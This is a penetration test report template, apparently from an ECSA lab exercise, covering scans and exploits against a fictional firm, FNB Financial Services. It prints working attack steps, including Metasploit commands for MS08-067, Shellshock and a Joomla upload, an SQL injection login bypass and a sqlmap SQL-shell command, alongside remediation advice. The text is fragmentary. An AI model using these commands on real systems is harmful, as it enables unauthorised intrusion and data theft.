Documente Academic
Documente Profesional
Documente Cultură
YOUR NAME
THIS REPORT CONTAINS PROPRIETARY INFORMATION THAT IS NOT TO BE SHARED, COPIED, DISCLOSED OR OTHERWISE
DIVULGED WITHOUT THE EXPRESS WRITTEN CONSENT OF YOUR NAME OR THEIR DESIGNATED REPRESENTATIVE. USE
OF THIS REPORTING FORMAT BY OTHER THAN YOUR NAME OR ITS SUBSIDIARIES IS STRICTLY PROHIBITED AND MAY
BE PROSECUTED TO THE FULLEST EXTENT OF THE LAW.
Disclaimer: THE RECOMMENDATIONS CONTAINED IN THIS REPORT ARE BASED ON INDUSTRY STANDARD “BEST
PRACTICES”. BEST PRACTICES ARE, BY NECESSITY, GENERIC IN NATURE AND MAY NOT TAKE INTO ACCOUNT
EXACERBATING OR MITIGATING CIRCUMSTANCES. THESE RECOMMENDATIONS, EVEN IF CORRECTLY APPLIED, MAY
CAUSE CONFLICTS IN THE OPERATING SYSTEM OR INSTALLED APPLICATIONS.
ANY RECOMMENDED CHANGES TO THE
OPERATING SYSTEM OR INSTALLED APPLICATION SHOULD FIRST BE EVALUATED IN A NON-PRODUCTION
ENVIRONMENT BEFORE BEING DEPLOYED IN YOUR PRODUCTION NETWORK.
YOUR NAME
HYDERABAD, INDIA - 500050
Document Details
Classification Confidential
Version v1.2
Reviewed By Nityanand
Approved By Nityanand
July 3, 2016 v1.1 Your Name Second draft Added more content
Recipient
Contact
Phone +91-9959043243
List of Tables
TABLE 1: TARGET SYSTEM............................................................................................................................................10
TABLE 2: TIMELINE .......................................................................................................................................................11
TABLE 3: SEVERITY LEVELS ...........................................................................................................................................12
TABLE 4: SUMMARY OF FINDINGS...............................................................................................................................12
TABLE 5: HOSTS AND OPERATING SYSTEMS ................................................................................................................23
TABLE 6: OPEN PORTS AND SERVICES ON HOSTS .............................................................................................24
1.4. Assumptions
We assumed that all IP addresses are public IP addresses and the organization has implemented the
security policies available with them.
1.5. Timeline
The timeline of the test is as below:
Categories Initiation Date/Time Completion Date/Time
Footprinting and
June 16, 2016 June 19, 2016
Reconnaissance
Network and Host
June 17, 2016 June 20, 2016
Scanning
Enumeration June 21, 2016 June 23, 2016
Exploitation June 25, 2016 July 2, 2016
Post Exploitation July 3, 2016 July 5, 2016
Clean-up July 6, 2016 July 8, 2016
Table 2: Timeline
This General Opinion will discuss several overarching concerns that became apparent during the
Penetration Testing. This discussion is intended to provide more in-depth and detailed analysis of the
various issues brought forth in the Executive Summary and provides further illumination on the more
significant risks to FNB Financial Services.
1.8.3. Personnel
While organizations try to employ a litany of security controls and processes to avoid becoming
a victim of security breach, human error is one factor that can’t always be controlled or relied
upon. Weak passwords, insecure coding practices, insecure configurations can be avoided by
educating the personnel involved FNB Financial services.
While several people involved with maintaining the network and systems have expressed
concerns over the access given to entities (such as developers), the FNB Financial Services
security architecture does not provide, by design, any means of limiting these individual's or
group's network infrastructure access. FNB Financial Services tends to accept the risks
associated with having a completely open internal architecture in order to accommodate the
1.8.7. Conclusion
Regardless of the frequency of vulnerability testing, no critical system can be considered acceptably
protected unless both the network segments and the critical hosts/servers are monitored
constantly for signs of abuse and intrusion attempts. Because new exploits and vulnerabilities
within devices and network operating systems are discovered regularly, it is impossible to test a
network completely, giving 100 percent assurance of being impervious to penetration either from
within or from outside. Additionally, FNB Financial Services has chosen a trust model in which
the application of stronger internal controls is more difficult than in a more restrictive trust model.
Therefore, the easiest method of detecting misuses would be some type of intrusion detection
system that is both network based and can do user profiling. Without appropriate identification
and authentication of users, referencing abuses to specific individuals becomes unreliable. Without
appropriate audit controls that ensure compliance with policies, the policies and procedures
themselves become untenable.
Your Name believes the corrective actions and recommendations in this report will improve FNB
Financial Services' ability to avoid breaches of information security. However, Your Name
strongly recommends that an Intrusion Detection and Identification and Authentication capability
be added to the network to detect misuse and intrusions and provide the information necessary
to support forensic investigations. It is also recommended that additional audit controls such as
compliance testing, independent log review, or configuration audits be implemented, with the
results of these controls incorporated with the results of the IDS capability. A policy and
procedure review, combined with a risk analysis, would also be very beneficial at this point in time
to streamline and reiterate those policies that are critical to the functioning of the enterprise. Web
applications should also be tested and patched for any security flaws.
Methodology:
We used nmap, nbtscan and zenmap for identifying hosts, open ports and services running in these
ports.
We note that the systems are 192.168.0.x, 10.xx.xxx.xxx, 172.xx.xxx.xxx and 172.xx.xxx.xxx as shown
in figure 2 above.
We scan the network using the Linux machine provided to us (IP Address: 192.168.0.5)
1. Use nbtscan to find the hosts’ IP Addresses in the network.
We find that there are 2 series: 172.17.0.xxx and 172.19.19.xxx. Run nbtscan for them
4. Using nmap ping sweep, we find that 172.17.0.3 is also up, hence it is a Linux system.
5. nmap ping sweep indicates that 172.19.19.5 is also up. Hence, it’s a Linux system.
Now we have identified all the hosts given in the ECSA assignment as shown in figure 10.
OPEN PORTS/SERVICES
IP Address Open Ports Services
10.10.0.2 21,80,135,139,445,3389, ftp, http MS IIS httpd 7.5, msrpc, netbios-ssn, rdp (ms-wbt-
47001,49152,49153,49154, server), MS HTTPAPI httpd 2.0
49155,49156,49157
10.10.0.3 21,80,135,139,445,3306,3389, ftp, http MS IIS httpd 7.5, msrpc, Mysql, rdp (ms-wbt-server),
47001,49152,49153,49154, netbios-ssn, MS HTTPAPI httpd 2.0
49155,49156,49157
172.19.19.2 21,45,80,135,139,445,3389, ftp, ssh (WeOnlyDo sshd 2.1.3), http, msrpc, rdp (ms-wbt-
49152,49153,49154,49155, server), netbios-ssn
49156,49157
172.19.19.3 21, 53,80,88,135,139,389,445, ftp, dns (ms dns 6.0.6001), http(ms iis httpd 7.0), kerberos(port
464,593,636,3268,3389,5357,57 88), msrpc, netbios-ssn, ldap, smb, kpassword5, http-rpc-epmap
22 (ncacn_http), rdp (ms-wbt-server), wsdapi
49152,49153,49154,49155,4915
7,
49158,49161,49165,49170
172.19.19.4 21,80,135,139,445,5357, ftp,http,msrpc,netbios-ssn, ms httpapi httpd 2.0
49152,49153,49154,49155,
49156,49157
172.19.19.5 21,80 ftp, http
172.19.19.6 21, 80,135,139,445,3306,49152, ftp, apache httpd 2.4.2, msrpc, netbios-ssn, mysql
49153,49154,49155,49156,
49157, 49158
172.19.19.7 21,80,135,139,445,5357,49152, ftp, ms iis httpd 7.0, msrpc, netbios-ssn , smb, ms httpapi
49153,49154,49155,49156, httpd 2.0
49157
172.19.19.8 21,135,139,445,3389 ftp, msrpc, netbios-ssn, Microsoft-ds smb, ms-wbt-server (rdp)
172.19.19.9 21, 80,135,139,445,3306,49152, ftp, apache httpd 2.4.2, msrpc, netbios-ssn, mysql,
49153,49154,49155,49156,4915 msrpc services
7,
49158
172.19.19.10 21, 80,135,139,445,49152, ftp, ms iis httpd 7.5, netbios-ssn, msrpc services, ms-wbt-server
49153,49154,49155,49156,4915 (rdp)
7
GNAT 21,135,139,445,1025,3389 ftp, msrpc, netbios-ssn, Microsoft-ds (smb), ms-wbt-server
ROUTER (rdp)
(192.168.0.1,
172.19.19.1,
172.17.0.1,
10.10.0.1)
Table 6: Open ports and services on hosts
Recommendations:
1. Close the unnecessary services on the targeted systems. Enable only the traffic you need to
access internal hosts — preferably as far as possible from the hosts you’re trying to protect
Exploitability:
1. Some of the services in the open ports are exploited successfully to gain access to the
systems and also escalate the privileges.
2. We could gain access to multiple hosts in the network.
4. Exploiting MS08-067
Open msfconsole in Kali Linux
As the exploit is available in metasploit, use the following commands as shown in figure 18:
use exploit/windows/smb/ms08_067_netapi
set RHOST 172.19.19.8
exploit and press enter
Type exit to come out of the shell and go back to meterpreter session to download the required
document to Kali machine
Goto the /root/Desktop/downloads location in Kali Linux to find the hash of the document
6. Challenge b
The b section of the challenge requires us to discover the “Personal” folder with large
images and find if these images contain sensitive data.
- Now we have to view these images using a steganography tool to find if any of these
images contain sensitive information
- We decide to use QuickStego tool which is there in Windows Server 2012 subnet A
machine
- To copy the machines to Windows server 2012 machine, we start apache server in Kali
Linux and host these image files in the server and download them in Windows 2012
machine.
So, first we download the images in Kali Linux in /var/www location as this the location where we
host files in apache server. We create “/var/www/images” and download the images here
3. dirb fuzzing
We run dirb to find hidden directories in the unbuntu machine.
In Kali Linux:
msfconsole
use exploit/multi/http/apache_mod_cgi_bash_exec
set RHOST 172.19.19.5
set TARGETURI /cgi-bin/cinema
set payload linux/x86/meterpreter/bind_tcp
exploit
It will bruteforce the username/passwords in the file provided and try to get meterpreter session
sessions –l
sessions –i 1 will connect to session 1
It will list the sessions obtained:
Let us find the FNB_Trading_Summary document and then find its hash:
When trying to access directories for other users, we get “access denied”
Impact:
The freesshd vulnerability leads to authentication bypass. The attacker can gain access to the
machine without using password, and using default username as “root”
The impact further increases by using privilege escalation using local windows exploits in metasploit.
We could remotely connect to the desktop of ACCOUNTS machine successfully as a result of the
vulnerability.
Result Analysis:
WeOnlyDo sshd 2.1.3 (protocol 2.0) is vulnerable to buffer overflow error when handling a specially
crafted key exchange algorithm string received from an SSH client. When exploited, it leads to
complete system compromise.
Recommendations:
- The vulnerable software versions should be patched on regular basis.
- Audit should be conducted regularly to find if machine is non-compliant i.e. with the un-
patched softwares. These should be patched immediately.
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
SQL injection refers to an injection attack wherein an attacker can execute malicious SQL statements
that control a web application’s database server. Since an SQL injection vulnerability could possibly
affect any website or web application that makes use of an SQL-based database, the vulnerability is
one of the oldest, most prevalent and most dangerous of web application vulnerabilities. It occurs
because of the un-validated user input being passed and processed by the web application. By
leveraging SQL injection vulnerability, given the right circumstances, an attacker can use it to bypass
a web application’s authentication and authorization mechanisms and retrieve the contents of an entire
database. SQL injection can also be used to add, modify and delete records in a database, affecting
data integrity. To such an extent, SQL injection can provide an attacker with unauthorized access to
sensitive data including, customer data, personally identifiable information, trade secrets, intellectual
property and other sensitive information.
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute
malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web
application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a
web application makes use of unvalidated or unencoded user input within the output it generates.
By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker would exploit a
vulnerability within a website or web application that the victim would visit, essentially using the
vulnerable website as a vehicle to deliver a malicious script to the victim’s browser. While XSS can be
taken advantage of within VBScript, ActiveX and Flash (although now considered legacy or even
obsolete), unquestionably, the most widely abused is JavaScript – primarily because JavaScript is
fundamental to most browsing experiences.
Exploitation:
1. SQL Injection for www.fnb.com
- Login to Windows server 2012 subnet A machine
- Open firefox browser
- Open www.fmb.com and press login button
- Provide the username as rrr’ or 1=1 --
- The addition of the or 1=1 -- condition causes the where clause to always evaluate to
true, which leads to successful login
Using parameter tampering in url, we could view profiles of other users as well:
2. XSS Attack:
- Go to Blog tab for www.fnb.com
- Figure 72 shows how the payload got injected in the page source:
Impact:
It allows the upload of arbitrary php files and get remote code execution.
Result Analysis:
We could successfully exploit the vulnerable “inboundio_marketing_file_upload” plugin and get the
access to the remote host. We could get the sensitive information on the remote host.
Recommendations:
1. Remove the vulnerable plugin if not required.
2. If the plugin is required, patch the software to get rid of the vulnerability.
Figure 85: set options for sshd exploit for ACCOUNTS machine
We got the meterpreter session using this exploit
Impact:
We could access the sensitive files such as group policy files in the target machine which can be used
for further exploits.
Result Analysis:
The machines which share the domain with AD server should be secured. Even if one machine is
compromised, it can lead to compromise of all the machines controlled by Domain controller.
Cache dump allowed us to crack the password for Jason which is a common network user in the
domain.
Recommendations:
1. Patch all the Machines in domain for any security bugs and keep them updated.
2. Strong passwords should be used for users.
3. AD server should be have secure configurations settings
https://technet.microsoft.com/en-us/library/dn535497.aspx
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
SQL injection refers to an injection attack wherein an attacker can execute malicious SQL
statements that control a web application’s database server. Since an SQL injection vulnerability
could possibly affect any website or web application that makes use of an SQL-based database, the
vulnerability is one of the oldest, most prevalent and most dangerous of web application
vulnerabilities. By leveraging an SQL injection vulnerability, given the right circumstances, an
attacker can use it to bypass a web application’s authentication and authorization mechanisms and
retrieve the contents of an entire database. SQL injection can also be used to add, modify and delete
records in a database, affecting data integrity. To such an extent, SQL injection can provide an
attacker with unauthorized access to sensitive data including, customer data, personally identifiable
information , trade secrets, intellectual property and other sensitive information.
The Xsecurity and moviescope sites are prone to SQL Injections. We confirmed by performing SQL
Injection in their login forms and then running SQLMAP tool to extract all the database
information as well as get a shell where sql server is running.
Exploitation:
1. Network Scanning:
Visit http://10.10.0.2/xsecurity
Try blind SQL injection for username:
To get the database version, let us open the shell through sqlmap in Kali Linux machine:
sqlmap -u http://10.10.0.2/moviescope/login.aspx --forms -p txtpwd -D Xsecurity –sql-shell
Recommendations:
To counter SQL injection attacks, you need to:
Constrain and sanitize input data. Check for known good data by validating for type, length,
format, and range.
Use type-safe SQL parameters for data access. You can use these parameters with stored
procedures or dynamically constructed SQL command strings. Parameter collections such
as SqlParameterCollection provide type checking and length validation. If you use a
parameters collection, input is treated as a literal value, and SQL Server does not treat it as
executable code. An additional benefit of using a parameters collection is that you can
enforce type and length checks. Values outside of the range trigger an exception. This is a
good example of defense in depth.
Use an account that has restricted permissions in the database. Ideally, you should only grant
execute permissions to selected stored procedures in the database and provide no direct
table access.
Avoid disclosing database error information. In the event of database errors, make sure you
do not disclose detailed error messages to the user.
Note Conventional security measures, such as the use of Secure Socket Layer (SSL) and IP Security
(IPSec), do not protect your application from SQL injection attacks.
Let us find metasploit exploit for Joomla. Let us exploit joomla_media_upload_exec in Kali Linux.
msfconsole
search joomla
use exploit/unix/webapp/ joomla_media_upload_exec
set payload php/meterpreter/bind_tcp
exploit
Impact:
The vulnerable web-application can be exploited by arbitrary file uploading and remote code
execution.
We could successfully exploit the joomla vulnerability and get the meterpreter session and perform
remote code execution. We could successfully read the sensitive documents like “RnD NDA.pdf”
Result Analysis:
The vulnerability in joomla can lead to remote code execution and hence, can lead to compromise
the entire machine. In this challenge, we could compromise RDDEPT machine.
Recommendations:
- Remove Joomla if not needed
- If needed by the web application, Joomla should be patched for any security
vulnerabilities and updated regularly.
Appendixes
Appendix A: References
5. SQL Injection
http://www.sqlinjection.net/risks/
6. SQL Injection
https://www.owasp.org/index.php/SQL_Injection
7. Cross-site Scripting
https://support.microsoft.com/en-us/kb/252985
Appendix B: Glossary
Black Box Black Box testing is used when the organization desires to test internal or external network security
Penetration from the perspective of an outsider with no knowledge of the organization, other than that which
Test: is in the public domain and freely available to anyone. The attacker has no advance knowledge of
the organization, except, perhaps, the name of the target. Black box testing most closely simulates
what an organization could expect from an outside attack in that, once any discovered vulnerability
is exploited and access to the network is gained, the attacker continues to exploit a specific
vulnerability as far as possible, with the ultimate goal of obtaining administrative-level access to the
vulnerable machine or extending network control to other machines. Because only the first
successful vulnerability is exploited, other vulnerabilities within the network go untested and may
lead to a false sense of security. Attacks are carried out as covertly as possible. Once the attacks
are observed and reported by the target organization, black box testing ceases. Black box testing is
also referred to as “no knowledge testing.” It is the most unreliable form of penetration testing.
Crystal Box Crystal Box testing is used when the organization desires to test internal or external network security
Penetration Test from the perspective of an attacker with full and complete knowledge of the organization, similar
to the knowledge possessed by an administrator. This knowledge normally includes passwords for
routers, firewalls and IDS Systems, network topology, machine configurations and other
information that an IT administrator would possess. As many discovered vulnerabilities as possible
are exploited within the timeframe specified in the engagement letter. Attacks may be carried out
overtly or covertly, as the organization desires. Crystal box testing provides the most thorough
assessment of the security posture of the network, in that multiple attack avenues are pursued with
detailed knowledge of the organization. Crystal box testing is also referred to as “full knowledge
testing” or “white box testing.”
Grey Box Grey Box testing is used when the organization desires to test internal or external network security
Penetration Test from the perspective of an attacker with only limited knowledge of the organization, similar to the
knowledge possessed by a non-IT employee. This knowledge normally includes machine names,
shared folder names, IP addresses, naming conventions and other information that a normal user
with no special access would know about the target organization. As many discovered
vulnerabilities as possible are exploited within the timeframe specified in the engagement letter.
Attacks may be carried out overtly or covertly, as the organization desires. Grey box testing assures
a more thorough assessment of the security posture of the network, in that several possible attack
avenues are pursued. Grey box testing is also referred to as “partial knowledge testing.”
Internet Foot Internet foot printing uses the Internet to search for information in the public domain that could
Printing assist an attacker in gaining access to the target’s network. While some information placed in the
public domain is required by law, regulation, or to assist in conducting business, excess information
in the public domain could result in an attacker gaining enough knowledge to conduct logical,
physical or social engineering attacks against the target. Expected results of Internet Footprinting
are: location addresses, business hours, telephone and fax numbers, contact names and e-mail
addresses; partners; merger/acquisition news; privacy and security policies in place; links to other
Web servers; employee names and information; networking equipment used; Web pages using input
forms, assigned IP address ranges and Points of Contact, etc.
Penetration Test The objective of penetration testing is to exploit discovered vulnerabilities to demonstrate that
specific vulnerabilities, present in the organization’s network, can be used to compromise network
security. It uses intrusion techniques, identical or similar to methods used by attackers to breach
network security, collect data and elevate the attacker’s privileges within the network. It can also
reveal the extent to which an organization’s security incident response capability is alerted by
observing the organization’s response to attack methodologies.
Vulnerability The objective of vulnerability testing is to discover possible attack vectors that can be used to
Assessment compromise the target network. It is a systematic examination of an information system or product
to determine the adequacy of security measures, identify security deficiencies, provide data from
which to predict the effectiveness of proposed security measures, and confirm the adequacy of such
measures after implementation.